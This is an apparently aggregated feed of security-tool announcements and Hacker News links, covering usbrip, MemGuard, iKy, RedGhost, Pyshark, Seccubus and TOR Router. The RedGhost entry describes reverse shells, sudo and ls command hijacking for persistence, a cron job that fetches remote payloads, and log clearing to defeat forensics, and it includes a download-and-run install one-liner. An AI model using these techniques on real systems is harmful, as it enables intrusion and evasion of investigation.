Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory



MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory


This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy is to collects information from an email and shows results in a nice visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 


It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation - 

This package no longer supports Python2. If you wish to still use it in Python2, you can:

Use version 0.3.8

  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook


"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"


Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt

 DOWNLOAD NOW!
DOWNLOAD NOW

Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         
  • seccubus                     Run a full Seccubus stack in a single container
  • seccubus-front            Serving just the front end HTML, javascript and css
  • seccubus-web             Serving front and code and API simultaniously
  • seccubus-api               Serving just the API.
  • seccubus-perl              Running command line scripts, e.g. to scan
  • seccubus-cron             Running cron deamon to execute scans


Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.

Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.

It script require root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com

6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.

Uninstalling/Stoping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After of run the script, follow the next steps to ensure that all is working as expected:

IP hidden and TOR network configured: 
Visit https://check.torproject.org, you should see a message like it:


Checking DNS Leaks: 

Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

Man who threw sandwich at US border agent not guilty of assault

Article URL: https://www.bbc.com/news/articles/c5ypvv8n1jvo

Comments URL: https://news.ycombinator.com/item?id=45841464

Points: 41

# Comments: 10

Article link

Date of publish: Thu, 06 Nov 2025 22:50:45 +0000

Game Design Is Simple

Article URL: https://www.raphkoster.com/2025/11/03/game-design-is-simple-actually/

Comments URL: https://news.ycombinator.com/item?id=45841262

Points: 23

# Comments: 8

Article link

Date of publish: Thu, 06 Nov 2025 22:24:23 +0000

Writing software is an act of learning. Don’t automate it.

Article URL: https://martinfowler.com/articles/llm-learning-loop.html

Comments URL: https://news.ycombinator.com/item?id=45841056

Points: 38

# Comments: 8

Article link

Date of publish: Thu, 06 Nov 2025 22:05:58 +0000

Hightouch (YC S19) Is Hiring

Article URL: https://job-boards.greenhouse.io/hightouch/jobs/5542602004

Comments URL: https://news.ycombinator.com/item?id=45840612

Points: 0

# Comments: 0

Article link

Date of publish: Thu, 06 Nov 2025 21:23:46 +0000

Universe's expansion 'is now slowing, not speeding up'

Article URL: https://ras.ac.uk/news-and-press/research-highlights/universes-expansion-now-slowing-not-speeding

Comments URL: https://news.ycombinator.com/item?id=45840200

Points: 66

# Comments: 60

Article link

Date of publish: Thu, 06 Nov 2025 20:45:39 +0000

You Should Write An Agent

Article URL: https://fly.io/blog/everyone-write-an-agent/

Comments URL: https://news.ycombinator.com/item?id=45840088

Points: 136

# Comments: 69

Article link

Date of publish: Thu, 06 Nov 2025 20:37:06 +0000

Two billion email addresses were exposed
LLMs Encode How Difficult Problems Are

Article URL: https://arxiv.org/abs/2510.18147

Comments URL: https://news.ycombinator.com/item?id=45838564

Points: 79

# Comments: 14

Article link

Date of publish: Thu, 06 Nov 2025 18:29:03 +0000

Show HN: TabPFN-2.5 – SOTA foundation model for tabular data

I am excited to announce the release of TabPFN-2.5, our tabular foundation model that now scales to datasets of up to 50,000 samples and 2,000 features - a 5x increase from TabPFN v2, published in the Nature journal earlier this year. TabPFN-2.5 delivers state-of-the-art predictions in one forward pass without hyperparameter tuning across classification and regression tasks.

What’s new in 2.5: TabPFN-2.5 maintains the core approach of v2 - a pretrained transformer trained on more than hundred million synthetic datasets to perform in-context learning and output a predictive distribution for the test data. It natively supports missing values, cateogrical features, text and numerical features is robust to outliers and uninformative features.

The major improvements:

- 5x scale increase: Now handles 50,000 samples × 2,000 features (up from 10,000 × 500 in v2)

- SOTA performance: TabPFN-2.5 outperforms tuned tree-based methods and matches the performance of a complex ensemble (AutoGluon 1.4), that itself includes TabPFN v2, tuned for 4 hours. Tuning the model improves performance, outperforming AutoGluon 1.4 for regression tasks.

- Rebuilt API: New REST interface along with Python SDK with dedicated fit & predict endpoints, making deployment and integration more developer-friendly

- A distillation engine that converts TabPFN-2.5 into a compact MLP or tree ensemble while preserving accuracy and offer low latency inference.

There are still some limitations. The model is designed for datasets up to 50K samples. It can handle larger datasets but that hasn’t been our focus with TabPFN-2.5. The distillation engine is not yet available through the API but only through licenses (though we do show the performance in the model report).

We’re actively working on removing these limitations and intend to release newer models focused on context reasoning, causal inference, graph networks, larger data and time-series. TabPFN-2.5 is available via API and a package on Hugging Face. Would love for you to try it and give us your feedback!

Model report: https://priorlabs.ai/technical-reports/tabpfn-2-5-model-repo...

Package: https://github.com/PriorLabs/TabPFN

Client: https://github.com/PriorLabs/tabpfn-client

Docs: https://docs.priorlabs.ai/quickstart


Comments URL: https://news.ycombinator.com/item?id=45838540

Points: 51

# Comments: 11

Article link

Date of publish: Thu, 06 Nov 2025 18:26:53 +0000

Please stop asking me to provide feedback #8036

Article URL: https://github.com/anthropics/claude-code/issues/8036

Comments URL: https://news.ycombinator.com/item?id=45838297

Points: 69

# Comments: 44

Article link

Date of publish: Thu, 06 Nov 2025 18:08:52 +0000

Swift on FreeBSD Preview

Article URL: https://forums.swift.org/t/swift-on-freebsd-preview/83064

Comments URL: https://news.ycombinator.com/item?id=45837871

Points: 156

# Comments: 89

Article link

Date of publish: Thu, 06 Nov 2025 17:37:49 +0000

The Parallel Search API

Article URL: https://parallel.ai/blog/introducing-parallel-search

Comments URL: https://news.ycombinator.com/item?id=45837425

Points: 71

# Comments: 31

Article link

Date of publish: Thu, 06 Nov 2025 17:04:41 +0000

ICC ditches Microsoft 365 for openDesk

Article URL: https://www.binnenlandsbestuur.nl/digitaal/internationaal-strafhof-neemt-afscheid-van-microsoft-365

Comments URL: https://news.ycombinator.com/item?id=45837342

Points: 481

# Comments: 147

Article link

Date of publish: Thu, 06 Nov 2025 16:57:55 +0000

Show HN: Dynamic code and feedback walkthroughs with your coding Agent in VSCode

I've been programming since I'm 6 and I don't want to quit. Since Agents came into existence I've been increasingly building more of the random ideas.

BUT, like many I kept getting stuck and frustrated where I wanted to make changes with the Agent that I knew I could've made without it but I had *no clue* how things worked.

